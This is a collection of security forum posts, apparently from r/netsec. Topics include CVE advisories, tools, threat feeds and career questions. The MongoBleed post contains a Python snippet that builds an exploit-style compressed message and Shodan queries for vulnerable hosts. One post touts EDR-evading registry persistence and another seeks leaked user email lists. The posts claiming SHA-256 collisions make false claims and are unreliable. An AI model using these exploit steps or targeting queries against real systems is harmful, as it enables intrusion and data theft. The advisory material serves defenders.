Hi everyone, I wrote a practical guide to finding soundness bugs in ZK circuits. It starts out with basic Circom examples, then discusses real-world exploits. Check it out if you are interested in auditing real-world ZK deployments.
The tool is more important than the blog post; it does everything automatically for you: https://github.com/Adversis/tailsnitch
A security auditor for Tailscale configurations. Scans your tailnet for misconfigurations, overly permissive access controls, and security best practice violations.
And if you just want the checklist: https://github.com/Adversis/tailsnitch/blob/main/HARDENING_TAILSCALE.md
The fourth iteration of the HardBit ransomware family shows elevated operational security, with mandatory operator-supplied runtime authorization that blurs forensic attribution. Its dual interface model, pairing legacy automated infection deployment with contemporary hands-on-keyboard techniques, plus an optional destructive wiper mode, represents a hybrid malware design converging extortion and sabotage.
Lateral movement via stolen credentials, combined with the disabling of recovery vectors, reflects targeting of high-value networks for durable control. The absence of a data leak site limits external visibility into victimology and complicates response efforts. This evolution underscores the intensifying sophistication and malice of ransomware operations.
Hi everyone,
I’m a 24-year-old cybersecurity and information security consultant working for a company in the Netherlands. I hold an HBO-level education and my main area of expertise is social engineering, with a strong focus on mystery guest and physical security assessments for clients.
Currently, I’m the only employee performing these types of projects. Our team was reduced from six people to just me, mainly to move away from multiple individual working styles and to allow the others to focus on long-term projects such as (C)ISO-related work.
Regarding physical security, my goal is to move toward an approach where I not only perform the physical tests (such as mystery guest or intrusion-style assessments), but also expand into providing advisory input on the theoretical and organizational side based on the findings. At the moment, my role is limited to executing the assessments and delivering the final report.
I’d like to further develop my skills and deepen my expertise by obtaining a certification this year (or however long it realistically takes). However, I’m finding it difficult to identify certifications that truly fit this niche. I’ve broadened my search beyond mystery guest and physical security to certifications focused on social engineering, ideally including the psychological or human-factor aspects, while still remaining rooted in security testing. OSINT certifications aren’t relevant enough, since there isn’t enough interest from clients.
Most psychology-oriented certifications are unfortunately not an option for me, as they require an HBO diploma with a psychology background. My background is in cybersecurity, and I’d prefer something that builds on that.
Practical constraints:
• Budget: ~€5,000 (with some flexibility if there’s a strong case)
• Time: I work full-time (40 hours), run my own business on the side, and have a private life, so anything requiring extreme workloads (e.g. 100+ hours/week) is not realistic
• Format: Online is preferred, unless the training is located in the Netherlands or nearby regions of Belgium or Germany
• Language: English or Dutch
I don’t currently hold any certifications in this specific area.
Does anyone have experience with certifications related to social engineering, human factors, or physical security testing that would fit this profile? Any recommendations or insights would be greatly appreciated.
I spent a few days analysing MongoDB; here is a summary of the analysis and findings.
MongoBleed, tracked as CVE-2025-14847, is an unauthenticated memory disclosure vulnerability affecting MongoDB across multiple major versions. It allows remote clients to extract uninitialized heap memory from the MongoDB process using nothing more than valid compressed wire-protocol messages.
This is not native RCE, and it is not a bug in the zlib library itself; the issue lies in MongoDB's compression/decompression handling, and the result is a memory disclosure. It leaves few traces: it is silent, repeatable, and reachable before authentication.
- Full Detailed Blog: https://phoenix.security/mongobleed-vulnerability-cve-2025-14847/
- Exploit explanation and lab: https://youtu.be/EZ4euRyDI8I
- Exploit Description (llm generated from article): https://youtu.be/lxfNSICAaSc
- Github Exploit for Mongobleed: https://github.com/Security-Phoenix-demo/mongobleed-exploit-CVE-2025-14847/tree/main
- Github Scanner for web: https://github.com/Security-Phoenix-demo/mongobleed-exploit-CVE-2025-14847/tree/main/scanner
- Github Scanner for Code: https://github.com/Security-Phoenix-demo/mongobleed-exploit-CVE-2025-14847/tree/main/code-sca
(Note: I spend more time writing exploits than prose, I have dyslexia, and I'm not a native English speaker, so an LLM proofread some sections. If that offends you, stop reading.)
| MongoDB Server | Vulnerable versions | Fixed versions |
|---|---|---|
| 8.2.x | 8.2.0 – 8.2.2 | 8.2.3 |
| 8.0.x | 8.0.0 – 8.0.16 | 8.0.17 |
| 7.0.x | 7.0.0 – 7.0.27 | 7.0.28 |
| 6.0.x | 6.0.0 – 6.0.26 | 6.0.27 |
| 5.0.x | 5.0.0 – 5.0.31 | 5.0.32 |
| 4.4.x | 4.4.0 – 4.4.29 | 4.4.30 |
| 4.2.x | All | EOL |
| 4.0.x | All | EOL |
| 3.6.x | All | EOL |
The SaaS version of MongoDB is already patched.
MongoDB supports network-level message compression.
When a client negotiates compression, each compressed message includes an uncompressedSize field.
The vulnerable flow: the client negotiates compression, sends a compressed message whose declared uncompressedSize is larger than the real payload, and the server trusts the declared size. Memory beyond the true decompressed data gets leaked back, with few IOCs to detect.
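To make that flow concrete, here is a minimal Python sketch of an OP_COMPRESSED frame with an inflated uncompressedSize. It follows the publicly documented wire format (opcode 2012, zlib compressor id 2); the inner body is a placeholder, and a real probe would first negotiate compression in the hello handshake rather than send this blindly.

```python
import struct
import zlib

OP_COMPRESSED = 2012        # wraps another message, per the wire-protocol spec
OP_MSG = 2013               # opcode of the message we pretend to wrap
ZLIB_COMPRESSOR_ID = 2

def build_op_compressed(inner_body: bytes, declared_uncompressed_size: int,
                        request_id: int = 1) -> bytes:
    """Wrap inner_body in OP_COMPRESSED while lying about uncompressedSize."""
    compressed = zlib.compress(inner_body)
    # originalOpcode (int32), uncompressedSize (int32, attacker-declared), compressorId (uint8)
    payload = struct.pack("<iiB", OP_MSG, declared_uncompressed_size,
                          ZLIB_COMPRESSOR_ID) + compressed
    # standard header: messageLength, requestID, responseTo, opCode
    header = struct.pack("<iiii", 16 + len(payload), request_id, 0, OP_COMPRESSED)
    return header + payload

# The real payload decompresses to 64 bytes, but the server is told 4096;
# the vulnerable code trusted the bigger number.
msg = build_op_compressed(b"\x00" * 64, declared_uncompressed_size=4096)
```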
The vulnerability originates in MongoDB’s zlib message decompression logic:
src/mongo/transport/message_compressor_zlib.cpp
In the vulnerable implementation, the decompression routine returned:
`return {output.length()};` Here `output.length()` is the allocated buffer size, not the number of bytes actually written by `::uncompress()`.
If the attacker declares a larger uncompressedSize than the real decompressed payload, MongoDB propagates the allocated size forward. Downstream BSON parsing logic consumes memory beyond the true decompression boundary.
The fix replaces this with:
`return length;` where `length` is the actual number of bytes written by the decompressor.
Additional regression tests were added in message_compressor_manager_test.cpp to explicitly reject undersized decompression results with ErrorCodes::BadValue.
This closes the disclosure path.
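As a language-agnostic analogue of the two return statements above, here is a Python sketch. Python zero-fills its buffers, so this models only the length-accounting bug, not the actual uninitialized-heap disclosure; the BadValue check mirrors the regression tests mentioned above.

```python
import zlib

def vulnerable_decompress(compressed: bytes, declared_size: int) -> bytes:
    """Analogue of returning output.length(): the whole allocated buffer flows downstream."""
    output = bytearray(declared_size)      # in C++ this buffer is uninitialized heap
    data = zlib.decompress(compressed)
    output[:len(data)] = data
    return bytes(output)                   # declared_size bytes, not len(data)

def fixed_decompress(compressed: bytes, declared_size: int) -> bytes:
    """Analogue of returning `length`: only bytes actually written survive."""
    data = zlib.decompress(compressed)
    if len(data) < declared_size:
        # undersized results are rejected, as in the added regression tests
        raise ValueError("BadValue: decompressed size smaller than declared size")
    return data
```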
Compression negotiation occurs before authentication.
The exploit does not require credentials or malformed packets. It relies on standard compression negotiation and a valid compressed message with an inflated uncompressedSize. Any network client can trigger it, which makes it trivial to use.
A working proof of concept exists and is public (links above). The PoC:
- requires no credentials
- sends no malformed packets
- supports repeatable probing
Heap memory is messy. That is the point.
The PoC output already shows real runtime artifacts of the kind you'd expect to leak.
MongoBleed does not provide native remote code execution.
There is no instruction pointer control. No shellcode injection. No crash exploitation.
What it provides is privilege discovery.
Memory disclosure enables:
A leaked Kubernetes token is better than RCE.
A leaked CI token is persistent RCE.
A leaked cloud role is full environment control.
This is RCE-adjacent through legitimate interfaces.
MongoDB is everywhere.
Shodan telemetry captured on 29 December 2025 shows:
213,490 publicly reachable MongoDB instances
Version breakdown (port 27017):
| Version | Count | Query |
|---|---|---|
| All versions | 201,659 | product:"MongoDB" port:27017 |
| 8.2.x | 3,164 | "8.2." |
| 8.0.x (≠8.0.17) | 13,411 | "8.0." -"8.0.17" |
| 7.0.x (≠7.0.28) | 19,223 | "7.0." -"7.0.28" |
| 6.0.x (≠6.0.27) | 3,672 | "6.0." -"6.0.27" |
| 5.0.x (≠5.0.32) | 1,887 | "5.0." -"5.0.32" |
| 4.4.x (≠4.4.30) | 3,231 | "4.4." -"4.4.30" |
| 4.2.x | 3,138 | "4.2." |
| 4.0.x | 3,145 | "4.0." |
| 3.6.x | 1,145 | "3.6." |
Most are directly exposed on the default port, not shielded behind application tiers.
This favors patient actors and automation.
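If you want to reproduce counts like these yourself, here is a small sketch using the official shodan Python library; it assumes you have an API key with query credits and that each per-version string from the table is combined with the base product filter.

```python
import shodan

QUERIES = {
    "all":   'product:"MongoDB" port:27017',
    "8.0.x": 'product:"MongoDB" port:27017 "8.0." -"8.0.17"',
    "7.0.x": 'product:"MongoDB" port:27017 "7.0." -"7.0.28"',
}

api = shodan.Shodan("YOUR_API_KEY")        # placeholder key
for label, query in QUERIES.items():
    result = api.count(query)              # count() returns totals without paging results
    print(f"{label:6s} {result['total']:>8,}  ({query})")
```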
Detection is hard: the exploit leaves few IOCs to look for. If you see filesystem artifacts or shells, you are already past exploitation.
If you cannot upgrade immediately, at minimum restrict network exposure so port 27017 is not reachable from untrusted clients. These are stopgaps; the bug lives in the server, so patch.
A full test suite is available, combining the exploit PoC, the network scanner, and the code scanner linked above.
Repository:
https://github.com/Security-Phoenix-demo/mongobleed-exploit-CVE-2025-14847
This allows you to verify exposure and confirm that the patch took.
MongoBleed does not break crypto; it leaks data straight out of memory.
The database trusts client-supplied lengths.
Attackers live for that assumption.
Databases are part of your application attack surface.
Infrastructure bugs leak application secrets.
Vulnerability management without reachability is incomplete.
Patch this.
Then ask why it was reachable.
A blog post on a technique I've been sitting on for almost 18 months that is wildly successful against all EDRs. Why? They only see the file write to %USERPROFILE% (NTUSER.MAN), not the resulting writes to HKCU.
Ultimately, that makes it incredibly effective for medium-integrity persistence through the registry without tripping detections.
Questions regarding netsec and discussion related directly to netsec are welcome here, as is sharing tool links.
As always, the content & discussion guidelines should also be observed on r/netsec.
Feedback and suggestions are welcome, but don't post them here; please send them to the moderator inbox.
nullspace - ssrf protection for node.js
blocks private ips, cloud metadata, loopback
handles encoding tricks (0x7f000001 = 127.0.0.1)
dns rebinding protection built-in
zero deps
github: https://github.com/bymehul/nullspace
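not nullspace's api - just a python sketch of the class of checks such a guard performs (resolve first, then refuse private/loopback/link-local targets), so encoded forms like 0x7f000001 are judged by what they resolve to; real protection also has to pin the resolved ip to block dns rebinding

```python
import ipaddress
import socket
from urllib.parse import urlparse

def is_public_destination(url: str) -> bool:
    host = urlparse(url).hostname or ""
    try:
        # Resolve whatever the URL points at; encoding tricks are judged by
        # the resolved address, not the string form.
        infos = socket.getaddrinfo(host, None)
    except socket.gaierror:
        return False
    for *_, sockaddr in infos:
        ip = ipaddress.ip_address(sockaddr[0].split("%")[0])
        if ip.is_private or ip.is_loopback or ip.is_link_local or ip.is_reserved:
            return False          # 169.254.169.254 (cloud metadata) lands here
    return True

print(is_public_destination("http://localhost/"))        # False (loopback)
print(is_public_destination("http://169.254.169.254/"))  # False (link-local metadata)
```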
Working with a CTO on visibility into what's actually running locally across a 70-engineer org. (For context: there's no ZTNA implementation at the moment; if there's a way to approach this from a ZTNA angle, I'd love to know.)
Engineers use Cursor heavily and have started adopting MCPs, and now there's a mix of verified, open-source, and basically untrusted GitHub repos running locally.
Customer creds are accessible from these environments. We want visibility first - detect what MCPs exist, where they're installed, track usage.
That part feels tractable. But from a detection/monitoring angle, once you know what's there - what's worth actually watching?
Some MCPs legitimately need local execution so you can't just block them. Full network proxying feels unrealistic for dev workflows.
How have you approached it? What can you implement after visibility?
Static analysis is necessary, but it feels incomplete when it comes to how systems behave under real conditions. How are others dealing with that gap?
When attackers use real credentials, everything they do can appear legitimate. Runtime monitoring often becomes the only way to spot it. How do you approach this in practice?
I’m approaching prompt injection less as an input sanitization issue and more as an authority and trust-boundary problem.
In many systems, model output is implicitly authorized to cause side effects, for example by triggering tool calls or function execution. Once generation is treated as execution-capable, sanitization and guardrails become reactive defenses around an actor that already holds authority.
I’m exploring an architecture where the model never has execution rights at all. It produces proposals only. A separate, non-generative control plane is the sole component allowed to execute actions, based on fixed policy and system state. If the gate says no, nothing runs. From this perspective, prompt injection fails because generation no longer implies authority. There’s no privileged path from text to side effects.
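To make the proposal/control-plane split concrete, here is a minimal Python sketch; the Proposal shape, the policy table, and the handler names are all hypothetical. The point is that text from the model never reaches an executor except through a fixed allowlist it cannot modify.

```python
from dataclasses import dataclass
from typing import Callable

@dataclass(frozen=True)
class Proposal:
    action: str
    args: dict

# The control plane owns this table; the model cannot extend it.
ALLOWED_ACTIONS: dict[str, Callable[..., str]] = {
    "lookup_order": lambda order_id: f"order {order_id}: shipped",
}

def control_plane_execute(p: Proposal, caller_is_authorized: bool) -> str:
    if not caller_is_authorized:
        return "denied: caller not authorized"
    handler = ALLOWED_ACTIONS.get(p.action)
    if handler is None:
        return f"denied: '{p.action}' is not an allowed action"
    return handler(**p.args)

# The model's output is parsed into a Proposal; injected text proposing
# "delete_all_users" simply fails the policy lookup and nothing runs.
print(control_plane_execute(Proposal("delete_all_users", {}), True))
print(control_plane_execute(Proposal("lookup_order", {"order_id": "42"}), True))
```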
I’m curious whether people here see this as a meaningful shift in the trust model, or just a restatement of existing capability-based or mediation patterns in security systems.
Runtime threats rarely trigger obvious alerts. Usually something just feels slightly off before anything breaks. What subtle signs have tipped you off in the past?
A lot of environments look secure on paper, but runtime attacks often operate quietly. Credential misuse, app-layer abuse, and supply chain compromises tend to blend in rather than break things. What runtime signals have actually helped you catch issues early?
I am presenting a verified second-preimage collision for the SHA-256 algorithm, specifically targeting the Bitcoin Genesis Block header (Hash: 000000000019d668...).
Unlike previous theoretical differential attacks, this method utilizes a structural exploit in the message schedule (W-schedule) to manipulate internal states during the compression function. This allows for the generation of an alternative preimage (Kaoru DNA) that results in an identical 256-bit output.
Key Technical Aspects:
This discovery suggests that the collision resistance of SHA-256 is fundamentally compromised under specific state-transition conditions.
Verification Code: https://osf.io/2gdzq/files/dqghk
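Independent of the linked code, here is a quick way to check any claimed alternative preimage against the genesis block hash. Bitcoin block hashes are double SHA-256 of the 80-byte header, displayed byte-reversed; the candidate bytes below are just a placeholder for whatever the verification code produces.

```python
import hashlib

GENESIS_HASH = "000000000019d6689c085ae165831e934ff763ae46a2a6c172b3f1b60a8ce26f"

def matches_genesis(candidate_header: bytes) -> bool:
    digest = hashlib.sha256(hashlib.sha256(candidate_header).digest()).digest()
    return digest[::-1].hex() == GENESIS_HASH

print(matches_genesis(b"\x00" * 80))   # placeholder candidate: expect False
```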
Every morning I find myself scrolling through 50+ tabs of RSS feeds, BleepingComputer, and CISA alerts. It’s exhausting.
I started a project called Threat Road to curate the "Top 3" most critical stories daily with a focus on immediate mitigations. I want to make it as useful as possible for the community.
I’d love your brutal honesty:
What makes a security newsletter "instant delete" for you?
Do you care about "Chili-pepper" risk ratings, or do you find them gimmicky?
Would you rather have a deep dive on one bug or a brief on three?
I'm just looking to hear what you all actually want in a daily briefing.
Little write-up for a patched WebSocket-based RCE I found in the CurseForge launcher.
It involved an unauthenticated local websocket API reachable from the browser, which could be abused to execute arbitrary code.
Happy to answer any questions if anyone has any!
Hey r/netsec -- it's been about two years since we last published a tool for the security community. As a little festive gift, today we're happy to announce the release of certgrep, a free Certificate Transparency search tool we built for our own detection work and decided to open up.
It’s focused on pattern-based discovery (regex/substring-style searches) and quick search and drill down workflows, as a complement to tools like crt.sh.
A few fun example queries it’s useful for:
- `(login|signin|account|secure).*yourbrand.*`
- `\*.*google.*yourbrand.*`
- `(cdn|assets|static).*`

We hope you like it, and would love to hear any feedback you folks may have! A number of iterations are coming up, including an API, SDKs, and integrations (e.g., Slack).
Enjoy!
A new research paper highlights a critical implementation flaw in how major vendors (ASUS, MSI, etc.) configure IOMMU during the DXE phase of boot.
The Core Issue:
The firmware reports DMA protection as "Active" to the OS, but fails to actually enable the IOMMU translation tables during the initial boot sequence. This creates a window of vulnerability where a malicious peripheral can read/write system memory unrestricted.
I've analyzed the root cause and the discrepancy between "Reported Status" vs "Actual Enforcement" in this report:
[👉 Full Analysis & Mitigation Strategies](https://www.nexaspecs.com/2025/12/critical-uefi-flaw-exposes-motherboards.html)
Has anyone started seeing patched BIOS versions roll out yet?
Hi everyone,
Over the last month I’ve been analyzing modular addition not as a bitwise operation, but as a fractional mapping. Treating (a + b) mod 2^32 as a projection into the fractional domain [0, 1), modular “bit loss” stops behaving like noise and instead becomes predictable geometric wrapping.
This leads to what I call the Kaoru Method.
The core idea is to run a “Shadow SHA-256” in parallel using infinite precision arithmetic. By comparing the real SHA-256 state with the shadow state, it’s possible to reconstruct a Universal Carry Map (k) that fully captures all modular wraps occurring during execution.
Once k is recovered for the 64 rounds, the modular barriers effectively disappear and the compression function reduces to a system of linear equations.
In my experiments, a standard SHA-256 block produces exactly 186 modular wraps. This number appears stable and acts like a structural “DNA” of the hash computation.
Under this framework, differential cryptanalysis becomes significantly simpler, since the carry behavior is no longer hidden. I’m releasing both the theoretical framework and an extractor implementation so others can validate, attack, or extend the idea toward full collisions.
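To illustrate the core mechanism, here is a stripped-down sketch of the carry tracking: each 32-bit addition is run both modulo 2^32 and with exact integers, and the number of wraps is recorded. The released extractor applies this across the full 64 rounds; this fragment shows only the bookkeeping, with the SHA-256 constants and schedule omitted.

```python
MASK32 = 0xFFFFFFFF

class ShadowAdder:
    def __init__(self) -> None:
        self.wraps = 0            # total modular wraps across the computation
        self.carry_map = []       # per-addition wrap counts ("k")

    def add(self, *terms: int) -> int:
        exact = sum(terms)                    # infinite-precision sum
        modular = exact & MASK32              # what real SHA-256 keeps
        k = exact >> 32                       # how many multiples of 2**32 were shed
        self.wraps += k
        self.carry_map.append(k)
        return modular

adder = ShadowAdder()
t1 = adder.add(0x6A09E667, 0xBB67AE85, 0x3C6EF372)   # example three-term addition
print(hex(t1), adder.carry_map)                      # carry_map shows [1]: one wrap
```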
Paper (theory):
https://osf.io/jd392/files/4qyxc
Code (Shadow SHA-256 extractor):
https://osf.io/n9xcw
DOI:
https://doi.org/10.17605/OSF.IO/JD392
I’m aware this challenges some long-held assumptions about modular addition as a source of non-linearity, so I’m especially interested in feedback, counterexamples, or independent replication.
Thanks for reading.
Over a year ago the government wanted to email the victims, but Bitfinex denied it. It is not too late if we act now. Has anyone heard of available email address lists of old crypto exchange users? Security researchers in possession of historic leak data could help return a nine-figure sum to victims soon.
Please suggest specific forums for outreach.
Thanks!
Ranked list of 2016 exchanges: Poloniex Bitstamp OKCoin BTC-e LocalBitcoins Huobi Xapo Kraken CoinJoinMess Bittrex BitPay NitrogenSports-eu Cex-io BitVC Bitcoin-de YoBit-net Cryptsy HaoBTC BTCC BX-in-th Hashnest BtcMarkets-net Gatecoin Purse-io CloudBet Cubits AnxPro Bitcurex AlphaBayMarket Luno BTCC Loanbase Bitbond BTCJam Bit-x BitPay BitBay-net NucleusMarket PrimeDice BitAces-me Bter MasterXchange CoinGaming-io CoinJar Cryptopay-me FaucetBOX Genesis-Mining
Mac Malware analysis
A few days ago u/broadexample pointed out that our free STIX feed was doing it wrong:
"You're creating everything as Indicator, not as IPv4Address linked to Indicator via STIX Relationship hierarchy. This works when you use just this feed alone, but for everyone using multiple feeds it would be much less useful."
They were right. We were creating flat Indicator objects instead of proper STIX 2.1 hierarchy with SCOs and Relationships.
Fixed it today. New V2 endpoint with:
- IPv4Address SCOs with deterministic UUIDs (uuid5 for cross-feed deduplication)
- Relationship objects linking Indicator → SCO ("based-on")
- Malware SDOs for 10 families (Stealc, LummaC2, Cobalt Strike, etc.)
- Relationship objects linking Indicator → Malware ("indicates")
Should actually work properly in OpenCTI now.
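For anyone building a consumer or a similar feed, here is a sketch of the V2 object shapes in plain JSON (not the exact generator code): deterministic uuid5 IDs in the STIX 2.1 SCO namespace, plus a "based-on" Relationship from the Indicator to the SCO. The canonical serialization rules for the uuid5 name are simplified here.

```python
import json
import uuid

# STIX 2.1 namespace used for deterministic SCO UUIDv5 IDs
STIX_SCO_NAMESPACE = uuid.UUID("00abedb4-aa42-466c-9c01-fed23315a9b7")

def ipv4_sco(value: str) -> dict:
    # uuid5 over the id-contributing properties: same IP -> same id across feeds
    det = uuid.uuid5(STIX_SCO_NAMESPACE, json.dumps({"value": value}))
    return {"type": "ipv4-addr", "spec_version": "2.1",
            "id": f"ipv4-addr--{det}", "value": value}

sco = ipv4_sco("203.0.113.7")
indicator_id = f"indicator--{uuid.uuid4()}"          # SDOs may use random UUIDs
based_on = {"type": "relationship", "spec_version": "2.1",
            "id": f"relationship--{uuid.uuid4()}",
            "relationship_type": "based-on",
            "source_ref": indicator_id, "target_ref": sco["id"]}
print(json.dumps([sco, based_on], indent=2))
```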
V2 endpoint: https://analytics.dugganusa.com/api/v1/stix-feed/v2
V1 still works if you just need IOC lists: https://analytics.dugganusa.com/api/v1/stix-feed
Full writeup: https://www.dugganusa.com/post/stix-v2-reddit-feedback-opencti-ready
Thanks for the feedback. This is why we post here - you catch the stuff we miss.
During routine threat hunting on my Beelzebub honeypot, I caught something interesting: a Rust-based DDoS bot with 0 detections across 60+ AV engines at the time of capture.
TL;DR:
In the post you'll find:
The fact that no AV detected it shows that Rust + string obfuscation is making life hard for traditional detection engines.
Questions? AMA!
I’ve opened the early access waitlist for CyberCTF.space, a cybersecurity CTF platform focused on real-world attacks, not puzzle-only challenges.
- Docker-based labs
- MITRE ATT&CK-aligned techniques
- Real-world exploits
🎖 Early joiners receive Founding Hacker recognition.
I’m also looking for security practitioners interested in contributing labs, challenges, or documentation.
Join the waitlist: https://cyberctf.space/
Contributors: https://cyberctf.space/contributors
Full disclosure: I'm a researcher at CyberArk Labs.
This is a technical deep dive from our threat research team, no marketing fluff, just code and methodology.
Static analysis tools like CodeQL are great at identifying "maybe" issues, but the signal-to-noise ratio is often overwhelming. You get thousands of alerts, and manually triaging them is impossible.
We built an open-source tool, Vulnhalla, to address this. It feeds CodeQL's "haystack" of alerts into GPT-4o, which reasons about the surrounding code context to verify whether each alert is legitimate.
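Roughly, the loop looks like the sketch below; the prompt and file layout are illustrative, not Vulnhalla's actual code.

```python
import json
from pathlib import Path
from openai import OpenAI

client = OpenAI()   # expects OPENAI_API_KEY in the environment

def triage(sarif_path: str, repo_root: str) -> list[dict]:
    """Ask the model to confirm or reject each CodeQL alert from a SARIF file."""
    results = json.loads(Path(sarif_path).read_text())["runs"][0]["results"]
    confirmed = []
    for r in results:
        loc = r["locations"][0]["physicalLocation"]
        path = loc["artifactLocation"]["uri"]
        line = loc["region"]["startLine"]
        lines = (Path(repo_root) / path).read_text(errors="ignore").splitlines()
        snippet = "\n".join(lines[max(0, line - 30): line + 30])
        answer = client.chat.completions.create(
            model="gpt-4o",
            messages=[{"role": "user", "content":
                       f"CodeQL alert: {r['message']['text']}\n"
                       f"File: {path}, line {line}\n\n{snippet}\n\n"
                       "Is this a real vulnerability? Answer YES or NO, then explain."}],
        ).choices[0].message.content
        if answer.strip().upper().startswith("YES"):
            confirmed.append({"path": path, "line": line, "verdict": answer})
    return confirmed
```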
The sheer volume of false positives often tricks us into thinking a codebase is "clean enough" just because we can't physically get through the backlog. That is frustrating, and the real vulnerabilities remain hidden in the noise.
Once we used GPT-4o to strip away ~96% of the false positives, we uncovered confirmed CVEs in the Linux Kernel, FFmpeg, Redis, Bullet3, and RetroArch. We found these in just 2 days of running the tool and triaging the output (total API cost <$80).
Running the tool for longer periods, with improved models, can reveal many additional vulnerabilities.
Write-up & Tool:
We don’t lack security ideas. We lack companies hiring juniors and products that are secure by default. These two problems are connected, and until we fix both, we’ll keep talking about a skills shortage while making it impossible to build a secure society.
What do you all think?
New preprint exploring unconventional cryptanalysis:
• Framework: “Inverse Dimensionalization”
• Target: SHA-256 structural analysis
• Result: 174/256 matching bits (M₁ = 88514, M₂ = 88551)
• Time: 3.8 seconds
• NOT a collision — but statistically anomalous
Paper + reproducible code: https://doi.org/10.17605/OSF.IO/6YRW8
Paper: https://osf.io/6yrw8/files/wj9ze
Code: https://osf.io/6yrw8/files/zy8ck
Verification code: https://osf.io/6yrw8/files/pqne7
Device specifications used to find the 174/256-bit match in 3.8 seconds:
• Google Colab Free CPU
• Intel Xeon
• Clock speed: between 2.20 GHz and 2.30 GHz
• Cores (vCPUs): 2 virtual cores
• RAM: 12 GB
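For anyone who wants to sanity-check a matching-bit count, here is a short script. The exact input encoding isn't stated above, so hashing the ASCII decimal strings of M₁ and M₂ is an assumption; swap in whatever the verification code actually hashes.

```python
import hashlib

def matching_bits(m1: bytes, m2: bytes) -> int:
    a = int.from_bytes(hashlib.sha256(m1).digest(), "big")
    b = int.from_bytes(hashlib.sha256(m2).digest(), "big")
    return 256 - bin(a ^ b).count("1")   # equal bits = total minus differing bits

print(matching_bits(b"88514", b"88551"))   # compare against the reported 174/256
```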
Security implications discussion welcome.
I’m traveling next week and will need to access a website that is IP-address-sensitive. My work computer’s IP address is approved for the site. If I access my work desktop remotely using something like LogMeIn or TeamViewer, will I be able to get onto the website I need to use? Or will the site see the public IP address I’m connecting from while away?
Built a threat intel platform that runs on $75/month infrastructure. Decided to give the STIX feed away for free instead of charging enterprise prices for it.
What's in it:
- 59K IOCs (IPs, domains, hashes, URLs)
- ThreatFox, OTX, honeypot captures, and original discoveries
- STIX 2.1 compliant (works with Sentinel, TAXII consumers, etc.)
- Updated continuously
Feed URL: https://analytics.dugganusa.com/api/v1/stix-feed
Search API (if you want to query it): https://analytics.dugganusa.com/api/v1/search?q=cobalt+strike
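If you want to poke at it quickly, here is a minimal pull-and-tally sketch; it assumes the endpoint returns a standard STIX 2.1 bundle ({"type": "bundle", "objects": [...]}).

```python
from collections import Counter
import requests

FEED = "https://analytics.dugganusa.com/api/v1/stix-feed"

bundle = requests.get(FEED, timeout=60).json()
counts = Counter(obj.get("type", "unknown") for obj in bundle.get("objects", []))
for obj_type, n in counts.most_common():
    print(f"{obj_type:20s} {n}")
```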
We've been running this for a few months. Microsoft Sentinel and AT&T are already polling it. Found 244 things before CrowdStrike/Palo Alto had signatures for them (timestamped, documented).
Not trying to sell anything - genuinely curious if it's useful and what we're missing. Built it to scratch our own itch.
Tear it apart.
tl;dr: Ask Claude Code to tee mitmdump output to a log file (with both request and response bodies). Create skills based on HackerOne public reports (downloaded from Hugging Face), then let Claude Code figure out whether it can find anything in the log file.
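For reference, a small mitmproxy addon is one way to get full request/response pairs into a single log file; this is just a sketch (save it as log_flows.py and run mitmdump -s log_flows.py), and plain teeing of mitmdump output works as well.

```python
from mitmproxy import http

LOG_PATH = "flows.log"

def response(flow: http.HTTPFlow) -> None:
    """Append each completed request/response pair to the log file."""
    with open(LOG_PATH, "a", encoding="utf-8") as f:
        f.write(f"=== {flow.request.method} {flow.request.pretty_url}\n")
        f.write(flow.request.get_text(strict=False) or "")
        f.write(f"\n--- status {flow.response.status_code}\n")
        f.write((flow.response.get_text(strict=False) or "")[:20000])  # cap huge bodies
        f.write("\n\n")
```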
An active phishing campaign targeting HubSpot customers has been detected by the Evalian SOC.
Just finished reading ActiveFence’s emerging threats assessment on 7 major models across hate speech, disinfo, fraud, and CSAM-adjacent prompts.
Key findings are: 44% of outputs were rated risky, 68% of unsafe ones were hate-speech-related, and only a single model landed in the safe range.
What really jumps out is how different vendors behave per abuse area (fraud looks relatively well-covered, hate and child safety really don’t).
For those doing your own evals/red teaming: are you seeing similar per-category gaps? Has anyone brought in an external research partner like ActiveFence to track emerging threats over time?